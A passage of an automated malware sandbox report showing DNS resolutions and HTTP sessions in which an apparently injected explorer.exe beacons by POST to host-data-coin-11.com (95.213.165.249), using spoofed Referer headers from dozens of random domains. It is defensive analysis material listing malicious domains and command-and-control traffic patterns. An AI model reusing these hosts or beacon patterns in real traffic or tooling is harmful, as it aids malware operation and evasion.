                                                                                                                                                                                Dec 1, 2021 10:04:40.162425995 CET8.8.8.8192.168.2.30x8b08No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:40.349658012 CET8.8.8.8192.168.2.30x51abNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:40.823241949 CET8.8.8.8192.168.2.30x10baNo error (0)host-file-host-3.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.372376919 CET8.8.8.8192.168.2.30x5d03No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.567605019 CET8.8.8.8192.168.2.30xf2a2No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.765840054 CET8.8.8.8192.168.2.30x4945No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:43.961553097 CET8.8.8.8192.168.2.30x33edNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:44.461524010 CET8.8.8.8192.168.2.30x8d35No error (0)host-file-host-3.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:46.757467985 CET8.8.8.8192.168.2.30x533eNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.218033075 CET8.8.8.8192.168.2.30xd273No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.410384893 CET8.8.8.8192.168.2.30xb33cNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.603219032 CET8.8.8.8192.168.2.30x7bccNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:47.842392921 CET8.8.8.8192.168.2.30xc219No error (0)privacytoolzforyou-7000.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.195394039 CET8.8.8.8192.168.2.30xb8adNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.489109993 CET8.8.8.8192.168.2.30x7124No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:51.745596886 CET8.8.8.8192.168.2.30x3cb3No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:52.658978939 CET8.8.8.8192.168.2.30xf436No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:52.982064962 CET8.8.8.8192.168.2.30xd5aeNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:53.345958948 CET8.8.8.8192.168.2.30xf945No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:53.563703060 CET8.8.8.8192.168.2.30xc7b1No error (0)host-file-host-3.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:04:59.842444897 CET8.8.8.8192.168.2.30x66e0No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.059180975 CET8.8.8.8192.168.2.30x8f32No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.258542061 CET8.8.8.8192.168.2.30x60d0No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.442418098 CET8.8.8.8192.168.2.30xf211No error (0)file-file-host4.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.451920033 CET8.8.8.8192.168.2.30x9f03No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:00.648046017 CET8.8.8.8192.168.2.30x1c3fNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:01.143867016 CET8.8.8.8192.168.2.30x2c42No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:01.388787031 CET8.8.8.8192.168.2.30x9ae6No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:01.583864927 CET8.8.8.8192.168.2.30xf3d8No error (0)host-file-host-3.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.536447048 CET8.8.8.8192.168.2.30xed4eNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.735825062 CET8.8.8.8192.168.2.30xa9e8No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:06.946532965 CET8.8.8.8192.168.2.30xe10aNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.148842096 CET8.8.8.8192.168.2.30x30c3No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.356832981 CET8.8.8.8192.168.2.30x2a02No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.561150074 CET8.8.8.8192.168.2.30x6236No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:07.790406942 CET8.8.8.8192.168.2.30xde2bNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.006221056 CET8.8.8.8192.168.2.30xef5cNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.205960989 CET8.8.8.8192.168.2.30x6dbaNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.405668020 CET8.8.8.8192.168.2.30x6d22No error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:08.640774012 CET8.8.8.8192.168.2.30x6afbNo error (0)host-data-coin-11.com95.213.165.249A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET8.8.8.8192.168.2.30x817dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET8.8.8.8192.168.2.30x817dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET8.8.8.8192.168.2.30x817dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET8.8.8.8192.168.2.30x817dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:05:51.098357916 CET8.8.8.8192.168.2.30x817dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:00.418350935 CET8.8.8.8192.168.2.30xaf06Name error (3)unic7m.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:05.667037964 CET8.8.8.8192.168.2.30x91b3No error (0)www.google.com142.250.184.100A (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:06.675901890 CET8.8.8.8192.168.2.30x469eName error (3)unic7m.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:12.252938032 CET8.8.8.8192.168.2.30x9361Name error (3)unic7m.topnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                Dec 1, 2021 10:06:15.543258905 CET8.8.8.8192.168.2.30x3998Name error (3)unic7m.topnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • cdn.discordapp.com
                                                                                                                                                                                • yubswhv.net
                                                                                                                                                                                  • host-data-coin-11.com
                                                                                                                                                                                • jmuwhyhn.net
                                                                                                                                                                                • piyyyphtem.net
                                                                                                                                                                                • llalic.com
                                                                                                                                                                                • higvbe.net
                                                                                                                                                                                • nvrwtjsdku.com
                                                                                                                                                                                • host-file-host-3.com
                                                                                                                                                                                • mojyvpeoe.com
                                                                                                                                                                                • yaoomuahu.net
                                                                                                                                                                                • dgpnslqhh.com
                                                                                                                                                                                • gbbxygekjk.com
                                                                                                                                                                                • namawqf.com
                                                                                                                                                                                • smpro.com
                                                                                                                                                                                • ieqswdu.net
                                                                                                                                                                                • vneyujlfl.net
                                                                                                                                                                                • viqgctnic.net
                                                                                                                                                                                • xpkskgrr.net
                                                                                                                                                                                • kdyponywr.net
                                                                                                                                                                                • rxdwffwjbf.com
                                                                                                                                                                                • molwdgi.net
                                                                                                                                                                                • gghke.net
                                                                                                                                                                                • dpsjrby.org
                                                                                                                                                                                • mlwynhpbb.org
                                                                                                                                                                                • njupmvh.com
                                                                                                                                                                                • mjghwr.org
                                                                                                                                                                                • unuta.org
                                                                                                                                                                                • fucabofxh.net
                                                                                                                                                                                • guasgjf.org
                                                                                                                                                                                • privacytoolzforyou-7000.com
                                                                                                                                                                                • bfwtp.org
                                                                                                                                                                                • pubplnqymd.org
                                                                                                                                                                                • xwkfccuhh.com
                                                                                                                                                                                • vndygv.com
                                                                                                                                                                                • wyjxomh.net
                                                                                                                                                                                • mdthdprqu.com
                                                                                                                                                                                • qpiidyh.net
                                                                                                                                                                                • mgjqknucl.net
                                                                                                                                                                                • ehiesag.net
                                                                                                                                                                                • eyepuy.net
                                                                                                                                                                                • file-file-host4.com
                                                                                                                                                                                • lqyvwperx.org
                                                                                                                                                                                • omcxl.net
                                                                                                                                                                                • vhude.com
                                                                                                                                                                                • rxjdalrcm.com
                                                                                                                                                                                • wxhnpjysno.com
                                                                                                                                                                                • tiketfrip.net
                                                                                                                                                                                • srvivkc.org
                                                                                                                                                                                • jjguoq.net
                                                                                                                                                                                • ysemel.net
                                                                                                                                                                                • dagsykb.org
                                                                                                                                                                                • owgeqjie.net
                                                                                                                                                                                • rvwnoilj.net
                                                                                                                                                                                • ggqrkginit.org
                                                                                                                                                                                • vutak.org

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.349759162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.34974995.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:26.041062117 CET1096OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://yubswhv.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 293
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:26.148890972 CET1097INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1b b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 19{i+,GO0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                10192.168.2.34975895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:35.989181995 CET2442OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://dgpnslqhh.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 343
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:36.089900970 CET2443INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:36 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 36 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 dd 4b d0 fe 26 85 21 ea a5 90 50 2e e2 be 4d 23 e3 b3 b4 6c fb 9f bc 50 ab 73 93 cb 32 40 5c 3c 0d 4b dd bb 4a be ff 57 99 bd d4 0b 8d 2b 80 cf 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 65I:82OB%,YR("XPK&!P.M#lPs2@\<KJW+0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                11192.168.2.34976695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:38.590396881 CET3031OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://gbbxygekjk.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 231
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:38.693572044 CET3074INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:38 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                12192.168.2.34976895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:38.789549112 CET3109OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://namawqf.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 308
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:38.896084070 CET3116INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:38 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                13192.168.2.34977095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.015736103 CET3117OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://smpro.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 200
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:39.116993904 CET3119INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.2.34977195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.205468893 CET3121OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ieqswdu.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 234
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:39.306132078 CET3122INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                15192.168.2.34977495.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.407718897 CET3125OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vneyujlfl.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 255
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:39.507246017 CET3127INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
